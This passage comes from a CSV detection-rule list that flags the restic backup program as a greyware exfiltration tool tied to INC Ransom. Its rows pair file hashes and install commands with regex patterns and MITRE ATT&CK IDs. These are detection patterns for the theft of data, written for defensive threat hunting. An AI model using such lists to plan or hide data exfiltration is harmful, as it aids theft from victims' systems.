Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*aada314b9afa5936d4ed401ba925106c20b07908ca39a9d363e0de57a99759ac*",".{0,1000}aada314b9afa5936d4ed401ba925106c20b07908ca39a9d363e0de57a99759ac.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*ab8de228f748301d39294ae37b82aa068a47c9d36b42fd23c06afcb3375da1cd*",".{0,1000}ab8de228f748301d39294ae37b82aa068a47c9d36b42fd23c06afcb3375da1cd.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data 
Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*ad4f5f6a6dbfe7ea29037f8d3a04161580cd109b99a3b474766927b2bf160984*",".{0,1000}ad4f5f6a6dbfe7ea29037f8d3a04161580cd109b99a3b474766927b2bf160984.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*ad932c8eeb195c5880274623fff8fb7f97c433133db49c29d46ad64fcdcb5698*",".{0,1000}ad932c8eeb195c5880274623fff8fb7f97c433133db49c29d46ad64fcdcb5698.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*add9c85b9fd3f3594d0630518ba59220b9eec8441205b2acf8c61d4068003eeb*",".{0,1000}add9c85b9fd3f3594d0630518ba59220b9eec8441205b2acf8c61d4068003eeb.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*ae4aa8f67e7cb800e060a454c72db0d8c0f8a94ba3ef520526c6d5df7f384995*",".{0,1000}ae4aa8f67e7cb800e060a454c72db0d8c0f8a94ba3ef520526c6d5df7f384995.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" 
"*aeabbac9038f4826a043f2adb165c46b6e2af47bb363aab713f4841b793d5406*",".{0,1000}aeabbac9038f4826a043f2adb165c46b6e2af47bb363aab713f4841b793d5406.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*af0592eecf1901f283b08bcbd1054f6ae50b5703c2da9ed8a4dcc858220de4a1*",".{0,1000}af0592eecf1901f283b08bcbd1054f6ae50b5703c2da9ed8a4dcc858220de4a1.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*af5c388b467a78ceba2e47c2b1840d28209f1d2c1063b21cb20d79ab18ef7956*",".{0,1000}af5c388b467a78ceba2e47c2b1840d28209f1d2c1063b21cb20d79ab18ef7956.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*afb6a4c0f19afbca0dcdfc6daecd05db72440b9f66be3b226bbdd3d601d256dd*",".{0,1000}afb6a4c0f19afbca0dcdfc6daecd05db72440b9f66be3b226bbdd3d601d256dd.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*apt install restic*",".{0,1000}apt\sinstall\srestic.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data 
Exfiltration","https://github.com/restic/restic","1","0","N/A","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*apt-get install restic*",".{0,1000}apt\-get\sinstall\srestic.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","N/A","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*b075acc6e8a6a1f619752b6106299e66ff7fc95032bd9a9096718c7600bd5c72*",".{0,1000}b075acc6e8a6a1f619752b6106299e66ff7fc95032bd9a9096718c7600bd5c72.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*b095c8ae34961ed96ebd2cfb8d99d0aae0c9194beee50efcb55743a56a3f2527*",".{0,1000}b095c8ae34961ed96ebd2cfb8d99d0aae0c9194beee50efcb55743a56a3f2527.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*b0d62a246efdf89a35137f55d840b7f7d1a6c231a4a2a14bd4ab2375355644ac*",".{0,1000}b0d62a246efdf89a35137f55d840b7f7d1a6c231a4a2a14bd4ab2375355644ac.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" 
"*b1213c190d359872abf866bbfbd98b8140e16177157d241330b2ad172fa59daa*",".{0,1000}b1213c190d359872abf866bbfbd98b8140e16177157d241330b2ad172fa59daa.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*b168ad78533011155648042d2900398596b0b128d12aeab2314424eb8be06794*",".{0,1000}b168ad78533011155648042d2900398596b0b128d12aeab2314424eb8be06794.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*b17778908c7e0b879b79b4aadf2dc28e9361e555fb68b35243c325b390628eed*",".{0,1000}b17778908c7e0b879b79b4aadf2dc28e9361e555fb68b35243c325b390628eed.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*b1cb1665e707241d9b0df4443c75ecd01f036562b1ab0d83eaf9a6fb4cfa018d*",".{0,1000}b1cb1665e707241d9b0df4443c75ecd01f036562b1ab0d83eaf9a6fb4cfa018d.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*b27ceab87644e8402f0a72d5f84bfa6e52b4c9c31293fe42fef6edba58fd81a3*",".{0,1000}b27ceab87644e8402f0a72d5f84bfa6e52b4c9c31293fe42fef6edba58fd81a3.{0,1000}","greyware_tool_keyword","restic","backup program used by threat 
actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*b379d721a766c8b80a121173be37050c9ecc94b11c5dbb0e246308ebbb5fbe74*",".{0,1000}b379d721a766c8b80a121173be37050c9ecc94b11c5dbb0e246308ebbb5fbe74.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*b396b58b9729c83406ade3cd3f6d52820a7ff6cf36cd4a59eb9d87ee267591fc*",".{0,1000}b396b58b9729c83406ade3cd3f6d52820a7ff6cf36cd4a59eb9d87ee267591fc.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*b3c09137b462548f44d764f98909534bef6e85fe029d4daf60545642cdefd3dd*",".{0,1000}b3c09137b462548f44d764f98909534bef6e85fe029d4daf60545642cdefd3dd.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*b3e1befd68844e32730608eb0bd7465a4e634154ac4a90ab8d48738c05054e42*",".{0,1000}b3e1befd68844e32730608eb0bd7465a4e634154ac4a90ab8d48738c05054e42.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data 
Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*b52adf7f57f96bc43c7380afc6aa2f549b530e42436af53ba5b6ca4a75ed343e*",".{0,1000}b52adf7f57f96bc43c7380afc6aa2f549b530e42436af53ba5b6ca4a75ed343e.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*b61cc885ac54a8f87869094cb343095b341e0db10898d2889942632f6155f1ff*",".{0,1000}b61cc885ac54a8f87869094cb343095b341e0db10898d2889942632f6155f1ff.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*b626b5bb92017ef63e3450aeeeb50583be95fadc09e9d2f44c5f37caa8a61e59*",".{0,1000}b626b5bb92017ef63e3450aeeeb50583be95fadc09e9d2f44c5f37caa8a61e59.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*b8c838d10851d63bca4f99ebb22b29989f517c66ea950eb0a9d7a4d110d2e86a*",".{0,1000}b8c838d10851d63bca4f99ebb22b29989f517c66ea950eb0a9d7a4d110d2e86a.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" 
"*b91f5ef6203a5c50a72943c21aaef336e1344f19a3afd35406c00f065db8a8b9*",".{0,1000}b91f5ef6203a5c50a72943c21aaef336e1344f19a3afd35406c00f065db8a8b9.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*b95a258099aee9a56e620ccebcecabc246ee7f8390e3937ccedadd609c6d2dd0*",".{0,1000}b95a258099aee9a56e620ccebcecabc246ee7f8390e3937ccedadd609c6d2dd0.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*ba1320c819ee2b6e29fe38ea4df592813e7219a89175313556110775f2204201*",".{0,1000}ba1320c819ee2b6e29fe38ea4df592813e7219a89175313556110775f2204201.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*ba4393a03124724ca068684e02727bcede7e897eaa3698362bf1a452d1ed5823*",".{0,1000}ba4393a03124724ca068684e02727bcede7e897eaa3698362bf1a452d1ed5823.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*bbe35e6cee0f2d86632a419a45fc63ec44eb1ef01f14fe53c5dddb527545e16f*",".{0,1000}bbe35e6cee0f2d86632a419a45fc63ec44eb1ef01f14fe53c5dddb527545e16f.{0,1000}","greyware_tool_keyword","restic","backup program used by threat 
actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*bcbd51fae14c1b87542a6130b0aea2f77d888615bc2ebcc517977d56ed1fe582*",".{0,1000}bcbd51fae14c1b87542a6130b0aea2f77d888615bc2ebcc517977d56ed1fe582.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*bcc708853cb655ade9ab3dba63fb1a585508ca1f55fe0ec41d97f84c97a25495*",".{0,1000}bcc708853cb655ade9ab3dba63fb1a585508ca1f55fe0ec41d97f84c97a25495.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*bcda505dc0c24c5a438490cb329180f6215a57d3fa5c1209570b86f9472f0474*",".{0,1000}bcda505dc0c24c5a438490cb329180f6215a57d3fa5c1209570b86f9472f0474.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*bcefbd70874b8198be4635b5c64b15359a7c28287d274e02d5177c4933ad3f71*",".{0,1000}bcefbd70874b8198be4635b5c64b15359a7c28287d274e02d5177c4933ad3f71.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data 
Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*bd6f57c36d0cf7393e1dcf6912c36887715864945fa06c457f135f9ea33fcf41*",".{0,1000}bd6f57c36d0cf7393e1dcf6912c36887715864945fa06c457f135f9ea33fcf41.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*be4b5c4bf5fde4fe59cbd98a5691035d5866613a2bb53ee8588d393ee14af667*",".{0,1000}be4b5c4bf5fde4fe59cbd98a5691035d5866613a2bb53ee8588d393ee14af667.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*be707189365dc12e5742234e07d2bae35ccdcff0de458dceefd4812796fe2fb8*",".{0,1000}be707189365dc12e5742234e07d2bae35ccdcff0de458dceefd4812796fe2fb8.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*bee03789cb90ecea446cce9211600312ca43c8ab4c6231ea64234b65eb2a5b82*",".{0,1000}bee03789cb90ecea446cce9211600312ca43c8ab4c6231ea64234b65eb2a5b82.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" 
"*bf1dcd0761b81ba9b79c01399083c6df74b709b44303ff01433753a9cc731caf*",".{0,1000}bf1dcd0761b81ba9b79c01399083c6df74b709b44303ff01433753a9cc731caf.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*bf6e09743df6899a02f0647d899fb008932760ea872667287bbc47b42091a3b0*",".{0,1000}bf6e09743df6899a02f0647d899fb008932760ea872667287bbc47b42091a3b0.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*c1309a2dc51340d2115e3c5e2ad31917c401132406e92774b70c2470ba631e7b*",".{0,1000}c1309a2dc51340d2115e3c5e2ad31917c401132406e92774b70c2470ba631e7b.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*c1439cff56678f08ca43ae32b4842fd43ada6b2c2798e647250e93bd32687c26*",".{0,1000}c1439cff56678f08ca43ae32b4842fd43ada6b2c2798e647250e93bd32687c26.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*c1adbf4fe3244c1e53659221eafb35da0de80dd9f7c653dc1cb9b8037f8d01d2*",".{0,1000}c1adbf4fe3244c1e53659221eafb35da0de80dd9f7c653dc1cb9b8037f8d01d2.{0,1000}","greyware_tool_keyword","restic","backup program used by threat 
actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*c2cc496b63e67636dbde1d94f31f5c36eb532f11953a36c56f7aebd7077befe5*",".{0,1000}c2cc496b63e67636dbde1d94f31f5c36eb532f11953a36c56f7aebd7077befe5.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*c3145c4f1e747ef9c1b2f953291f96f87abeb3e9686e8a91340ed4bd191d9941*",".{0,1000}c3145c4f1e747ef9c1b2f953291f96f87abeb3e9686e8a91340ed4bd191d9941.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*c3224f8327d7cf805b9447314f6066bec357dce64c60a0937aa3b8eb1458c496*",".{0,1000}c3224f8327d7cf805b9447314f6066bec357dce64c60a0937aa3b8eb1458c496.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*c390aca094d308acc9e06e4375915c05c9aa1bb67e407e86a6b77e59de694469*",".{0,1000}c390aca094d308acc9e06e4375915c05c9aa1bb67e407e86a6b77e59de694469.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data 
Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*c400a97000f7567515c3ffa560694f83927c8a77add8da737f567b2ff3812054*",".{0,1000}c400a97000f7567515c3ffa560694f83927c8a77add8da737f567b2ff3812054.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*c4677e4eaf38ceda97841c8cae883883e026751970b41bb1a3f5e0610e07a5b1*",".{0,1000}c4677e4eaf38ceda97841c8cae883883e026751970b41bb1a3f5e0610e07a5b1.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*c47c3409ede8542ee139232513fe3f1c30b0360bce5d33f65fab9a32f9abb802*",".{0,1000}c47c3409ede8542ee139232513fe3f1c30b0360bce5d33f65fab9a32f9abb802.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*c4c8c47da78cce55a75fb1bd7f528ba5eb4a2e2f96ae1927a705bac7eebde224*",".{0,1000}c4c8c47da78cce55a75fb1bd7f528ba5eb4a2e2f96ae1927a705bac7eebde224.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" 
"*c53a614a1a1536db55204e938e84708de9f18c42b613a470e46d433fd83a6db0*",".{0,1000}c53a614a1a1536db55204e938e84708de9f18c42b613a470e46d433fd83a6db0.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*c5d39c81e4ab9e8ec45e8cd742d449ceb944b73fe90cd24aaff3d89bc7ebb3e4*",".{0,1000}c5d39c81e4ab9e8ec45e8cd742d449ceb944b73fe90cd24aaff3d89bc7ebb3e4.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*c5eca1ce456b855510b7da24a0204941c5d7a516da8b8b5af6a88f258a1994f5*",".{0,1000}c5eca1ce456b855510b7da24a0204941c5d7a516da8b8b5af6a88f258a1994f5.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*c6f0b7931f8df1223c5edb6adef3919350e1eec95c9493748fb995c2d968f672*",".{0,1000}c6f0b7931f8df1223c5edb6adef3919350e1eec95c9493748fb995c2d968f672.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*c703e6aa71038579068c826ba7f8cabdfa61de7345f389cbcbf779ef5c3e0767*",".{0,1000}c703e6aa71038579068c826ba7f8cabdfa61de7345f389cbcbf779ef5c3e0767.{0,1000}","greyware_tool_keyword","restic","backup program used by threat 
actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*c7652b1555ab67b927ea24b856f1a81cbd21067afbbce16ee6db88022714dfde*",".{0,1000}c7652b1555ab67b927ea24b856f1a81cbd21067afbbce16ee6db88022714dfde.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*c792d1729f05d22140c7e71092c3ba3314d7a9b2cdd9022160b60574e50a9826*",".{0,1000}c792d1729f05d22140c7e71092c3ba3314d7a9b2cdd9022160b60574e50a9826.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*c7dca90fb6fd83cee8b9f6a2776f5839794341af1953d251bf06a91870be7a8e*",".{0,1000}c7dca90fb6fd83cee8b9f6a2776f5839794341af1953d251bf06a91870be7a8e.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*c7e58365d0b888a60df772e7857ce8a0b53912bbd287582e865e3c5e17db723f*",".{0,1000}c7e58365d0b888a60df772e7857ce8a0b53912bbd287582e865e3c5e17db723f.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data 
